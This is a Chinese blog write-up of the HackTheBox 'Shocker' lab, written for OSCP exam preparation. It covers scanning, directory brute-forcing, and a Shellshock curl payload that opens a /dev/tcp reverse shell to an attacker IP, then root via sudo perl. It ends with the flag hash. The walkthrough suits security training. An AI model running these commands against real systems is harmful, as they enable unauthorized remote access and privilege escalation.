OSCP备考_0x01_HackThBox靶机_Linux_Shocker

Ethan医生1周前靶场19

先连接到外网开放的服务器openvpn xxx.ovpn

信息收集

nmap -p- 10.129.216.48 (这样扫描太慢了)

image.png

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.48 (扫描TCP)

image.png

nmap -sU --top-ports 100 10.129.216.48(扫描UDP)

image.png


看到2222有枚举先测试看看

python2.7 40136.py 10.129.216.48:2222 -U /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt -e


先查看80端口有啥Don't Bug Me!

image.png

先把图片下载下来看里面有啥 ,没有啥线索,只能爆破看看

gobuster dir -u http://10.129.216.48/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

gobuster dir -u http://10.129.216.48/ -w /usr/share/wordlists/dirb/big.txt   (为啥使用dirb/big 因为有cgi-bin目录)

image.png

再看cgi-bin底下有没有可以利用的文件

image.png

gobuster dir -u http://10.129.216.48/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x pl,sh,cgi

image.png

发现有个user.sh,让我想到shellshock

curl -A "() { :;};/bin/bash -i &>/dev/tcp/10.10.16.31/3333 <&1" http://10.129.216.48/cgi-bin/user.sh 


nc -lvnp 3333 

image.png


sudo -l

image.png

sudo perl -e 'exec "/bin/sh";' 提权收工

image.png

17b1ba945c650cd12b9da192b64b7b72

标签: OSCP

相关文章

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。